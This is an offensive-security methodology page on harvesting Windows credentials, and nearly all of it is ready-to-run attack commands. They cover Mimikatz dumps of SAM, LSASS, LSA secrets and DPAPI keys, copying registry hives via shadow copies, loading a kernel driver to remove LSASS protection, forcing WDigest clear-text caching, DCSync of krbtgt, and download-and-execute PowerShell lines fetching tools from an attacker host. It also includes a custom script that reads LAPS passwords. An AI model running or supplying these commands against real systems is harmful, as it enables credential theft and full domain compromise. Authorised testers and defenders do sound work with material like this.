Credential harvesting (Windows)
:::tip Page format
The methodology keeps the original headings, tables, figures and code blocks; commands and parameters are given in English, with no translation of their syntax.
:::
Procedure
- Consolidate the current level of access and gather context (OS, network, domain).
- Keep noise to a minimum: avoid unnecessary actions outside the scope.
- Record commands and their output for the report.
- Headings and example commands follow below.
Methodology
Mimikatz
module::command <parameter>
SAM (Local Windows credentials) - Local
"privilege::debug" "token::elevate" "lsadump::sam" "exit"
Obtain SAM & SYSTEM (ShadowCopy)
wmic shadowcopy call create Volume='C:\'
vssadmin list shadows
[...]
Shadow Copy Volume: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
[...]
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\sam C:\Windows\Tasks\sam
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system C:\Windows\Tasks\system
Obtain SAM & SYSTEM (Windows Registry)
reg save HKLM\sam C:\Windows\Tasks\sam
reg save HKLM\system C:\Windows\Tasks\system
Decrypt SAM offline with the SYSTEM hive (the bootkey lives in SYSTEM)
pip2.7 install pycryptodome
git clone https://github.com/Neohapsis/creddump7
python2.7 creddump7/pwdump.py system sam
"lsadump::sam /system:.\system /sam:.\sam" "exit"
secretsdump.py -sam SAM -system SYSTEM [-security SECURITY] local
Local Administrator Password Solution (LAPS)
Get-ChildItem "$env:ProgramFiles\LAPS\CSE\Admpwd.dll"
Get-ChildItem 'C:\Program Files\LAPS\CSE\Admpwd.dll'
Get-ChildItem 'C:\Program Files (x86)\LAPS\CSE\Admpwd.dll'
# Enumerate computers with LAPS (PowerView): only LAPS-managed hosts have an expiration time set
(new-object system.net.webclient).downloadstring('http://<YOUR_IP>/powerview.ps1') | IEX
get-netcomputer -Filter "(ms-mcs-admpwdexpirationtime=*)" | select dnshostname
# Enumerate the groups delegated to read LAPS passwords (LAPSToolkit)
(new-object system.net.webclient).downloadstring('http://<YOUR_IP>/LAPSToolkit.ps1') | IEX; Find-LAPSDelegatedGroups
Alternative 1 - LAPSToolkit
(new-object system.net.webclient).downloadstring('http://<YOUR_IP>/powerview.ps1') | IEX
(New-Object System.Net.WebClient).DownloadString('http://<YOUR_IP>/LAPSToolkit.ps1') | IEX;
# List all computers that are set up with LAPS and display the hostname, the clear text password, and the expiration time
Get-LAPSComputers
Alternative 2 - Get-ADObject
(new-object system.net.webclient).downloadstring('http://<YOUR_IP>/PowerView.ps1') | IEX
Get-ADObject -Name <COMPUTER_NAME> -DomainController <DC_IP> -Properties ms-mcs-admpwd
Alternative 3 - Metasploit
use post/windows/gather/credentials/enum_laps
set session 1
exploit
Alternative 4 - Get-LAPSPasswords
(New-Object System.Net.WebClient).DownloadString('http://<YOUR_IP>/Get-LAPSPasswords.ps1') | IEX;
Get-LAPSPasswords -DomainController <DC> -Credential <DOMAIN>\administrator
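The same enumeration without downloading PowerView or LAPSToolkit, as an added example that is not part of the original page or of those tools: it uses the built-in ADSI searcher to find LAPS-managed computers and read the password where the current principal is allowed to. It queries the legacy attributes named on this page (`ms-Mcs-AdmPwd`, `ms-Mcs-AdmPwdExpirationTime`) and, going one step beyond the page, the Windows LAPS attributes (`msLAPS-Password`, `msLAPS-PasswordExpirationTime`). The function name and parameters are this example's own.

```powershell
# Added example (not from the original page): LAPS enumeration with System.DirectoryServices.
function Get-LapsComputer {
    param(
        [string]$SearchBase = ([adsi]'LDAP://RootDSE').defaultNamingContext,
        [string]$ComputerName = '*'
    )
    # Only computers with an expiration time set are LAPS-managed (legacy or Windows LAPS)
    $filter = "(&(objectCategory=computer)(name=$ComputerName)" +
              "(|(ms-Mcs-AdmPwdExpirationTime=*)(msLAPS-PasswordExpirationTime=*)))"
    $searcher = New-Object System.DirectoryServices.DirectorySearcher([adsi]"LDAP://$SearchBase", $filter)
    $searcher.PageSize = 500
    foreach ($attr in 'dNSHostName', 'ms-Mcs-AdmPwd', 'ms-Mcs-AdmPwdExpirationTime',
                      'msLAPS-Password', 'msLAPS-PasswordExpirationTime') {
        [void]$searcher.PropertiesToLoad.Add($attr)
    }

    # First value of an attribute, or $null when the DC did not return it. The password
    # attributes are simply omitted from the result when the caller has no read access.
    function Get-FirstValue($props, $name) {
        if ($props.Contains($name) -and $props[$name].Count -gt 0) { $props[$name][0] }
    }

    foreach ($r in $searcher.FindAll()) {
        $p    = $r.Properties
        $pwd  = Get-FirstValue $p 'ms-mcs-admpwd'
        $exp  = Get-FirstValue $p 'ms-mcs-admpwdexpirationtime'
        $json = Get-FirstValue $p 'mslaps-password'
        if (-not $pwd -and $json) {
            # Windows LAPS (clear-text mode) stores JSON: {"n":"<account>","t":"<filetime>","p":"<password>"}
            $pwd = ($json | ConvertFrom-Json).p
        }
        if (-not $exp) { $exp = Get-FirstValue $p 'mslaps-passwordexpirationtime' }
        # Expiration times are Windows FILETIME values (100 ns ticks since 1601-01-01 UTC)
        $expires = if ($exp) { [datetime]::FromFileTimeUtc([int64]$exp) } else { $null }
        $shown   = if ($pwd) { $pwd } else { '<not readable by current principal>' }
        [pscustomobject]@{
            Host     = Get-FirstValue $p 'dnshostname'
            Password = $shown
            Expires  = $expires
        }
    }
}

Get-LapsComputer | Format-Table -AutoSize
```

Hosts listed with `<not readable by current principal>` are still useful: they tell you which machines are LAPS-managed, and `Find-LAPSDelegatedGroups` above shows which groups you would need to compromise to read their passwords.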
Local Security Authority Subsystem Service (LSASS)
"privilege::debug" "token::elevate" "sekurlsa::logonPasswords" "lsadump::secrets" "exit"
Local Security Authority (LSA) Protection Evasion
# A non-zero RunAsPPL means LSASS runs as a protected process (PPL): user-mode dumps and sekurlsa::* fail
Get-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name "RunAsPPL"
mimidrv.sys (mimikatz kernel driver) - Invoke-Mimikatz
# Requires admin rights; the driver is signed but widely detected, so expect EDR alerts
cmd /c 'sc create mimidrv binPath= C:\Windows\Tasks\mimidrv.sys type= kernel start= demand'
cmd /c 'sc start mimidrv'
Disable PPL
"privilege::debug" "token::elevate" "!+" "!processprotect /process:lsass.exe /remove" "sekurlsa::logonpasswords" "lsadump::secrets" "sekurlsa::dpapi" "exit"
# Once the protection is removed (or if RunAsPPL was never set) the driver is no longer needed
"privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::secrets" "sekurlsa::dpapi" "exit"
Dumping LSASS process memory
.\procdump64.exe -accepteula -ma lsass.exe lsass.dmp
.\mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" "exit"
Data Protection API (DPAPI)
Enumerate
vaultcmd /list
vaultcmd /listcreds:"<VAULT>" /all
# Credentials saved in the Windows Vault (i.e. logins from Internet Explorer and Edge).
.\Seatbelt.exe WindowsVault
# Windows credential DPAPI blobs
.\Seatbelt.exe WindowsCredentialFiles
====== WindowsCredentialFiles ======
Folder : C:\Users\User\AppData\Local\Microsoft\Credentials\
FileName : 6C33AC85D0C4DCEAB186B3B2E5B1AC7C
Description : Local Credential Data
MasterKey : bfc5090d-22fe-4058-8953-47f6882f549e
# List DPAPI master keys
.\Seatbelt.exe DpapiMasterKeys
Folder : C:\Users\bfarmer\AppData\Roaming\Microsoft\Protect\S-1-5-21-569305411-121244042-2357301523-1104
LastAccessed LastModified FileName
============ ============= ====================================
1/16/2023 5:56:24 PM 487e7db0-f4fh-4301-8248-c225d49c5ah7
1/16/2023 5:56:35 PM bfc5090d-22fe-4058-8953-47f6882f549e
[*] Use the Mimikatz "dpapi::masterkey" module with appropriate arguments (/pvk or /rpc) to decrypt
[*] You can also extract many DPAPI masterkeys from memory with the Mimikatz "sekurlsa::dpapi" module
[*] You can also use SharpDPAPI for masterkey retrieval
Obtaining the keys
.\mimikatz.exe !sekurlsa::dpapi
# In Cobalt Strike's Beacon the `!` prefix runs the mimikatz command as SYSTEM (in standalone mimikatz `!` routes the command through the mimidrv driver instead). Decrypting a master key over RPC only works in the context of the user who owns the key: if your Beacon is running as another user or SYSTEM, impersonate the target user first, then run the command with the `@` modifier (use the current token).
mimikatz dpapi::masterkey /rpc /in:C:\Users\<USER>\AppData\Roaming\Microsoft\Protect\<FOLDER>\<MASTER_KEY>
Vault decryption
"dpapi::cred /in:C:\Users\<USER>\AppData\Local\Microsoft\Credentials\<VAULT_FILENAME> /masterkey:<MASTERKEY>" "exit"
Scheduled Tasks Credentials
.\mimikatz.exe "dpapi::cred /in:C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\<FILE_NAME>"
.\mimikatz.exe "privilege::debug" "token::elevate" "!sekurlsa::dpapi" "exit"
.\mimikatz.exe dpapi::cred /in:C:\Windows\System32\config\syst
Kerberos Encryption Keys
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "sekurlsa::ekeys"'
.\SafetyKatz.exe "sekurlsa::ekeys"
WDigest Authentication
# Takes effect only for logons that happen after the change: existing sessions are not re-cached in clear text, so wait for (or trigger) a new interactive logon before dumping
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
.\mimikatz.exe "sekurlsa::wdigest"
Dumping secrets
.\mimikatz.exe "token::elevate" "lsadump::secrets" "exit"
secretsdump [-just-dc] <DOMAIN>/<USERNAME>:'<PASSWORD>'@<DC>
VPN credentials
C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Network\Connections\Pbk\rasphone.pbk
"privilege::debug" "token::elevate" "lsadump::secrets" "exit"
[...]
Secret : L$_RasConnectionCredentials#0
cur/hex : 30 00 00 00 00 00 05 00 30 80 ab 62 21 85 f3 42 8a 33 26 87 51 46 82 20 0e 00 00 00 73 00 65 00 63 00 72 00 65 00 74 00 00 00 00 00 00 00 00 00 48 00 00 00 00 00 05 00 b5 b0 fe 50 59 98 6d 49 8f 31 4e 4c 77 24 4f 5a 28 00 00 00 79 00 6f 00 75 00 72 00 5f 00 70 00 72 00 65 00 5f 00 73 00 68 00 61 00 72 00 65 00 64 00 5f 00 6b 00 65 00 79 00 00 00 00 00 00 00 50 00 00 00 00 00 05 00 d4 dd fb 7c b6 f3 49 47 99 52 56 e9 ef 91 76 41 2a 00 00 00 76 00 70 00 6e 00 5f 00 31 00 5f 00 70 00 72 00 65 00 2d 00 73 00 68 00 61 00 72 00 65 00 64 00 5f 00 6b 00 65 00 79 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 00 00 00 05 00 5a 39 4b 1f 87 b1 0a 4e aa ad c0 56 3a 3d c1 91 2a 00 00 00 76 00 70 00 6e 00 5f 00 32 00 5f 00 70 00 72 00 65 00 2d 00 73 00 68 00 61 00 72 00 65 00 64 00 5f 00 6b 00 65 00 79 00 00 00 00 00 00 00 00 00 00 00 00 00
DCSync
Invoke-Mimikatz -Command '"lsadump::dcsync /user:<DOMAIN>\krbtgt"'
Browser Credentials
AppData\Roaming\Mozilla\Firefox\Profiles\
AppData\Local\Google\Chrome\User Data\Default\Login Data
AppData\Local\Microsoft\Edge\User Data\Default\Login Data
# Login Data is an SQLite database; saved passwords are DPAPI-protected (recent Chromium builds encrypt them with an AES key that is itself DPAPI-protected in the profile's Local State file), so they must be decrypted in the owning user's context or with that user's master key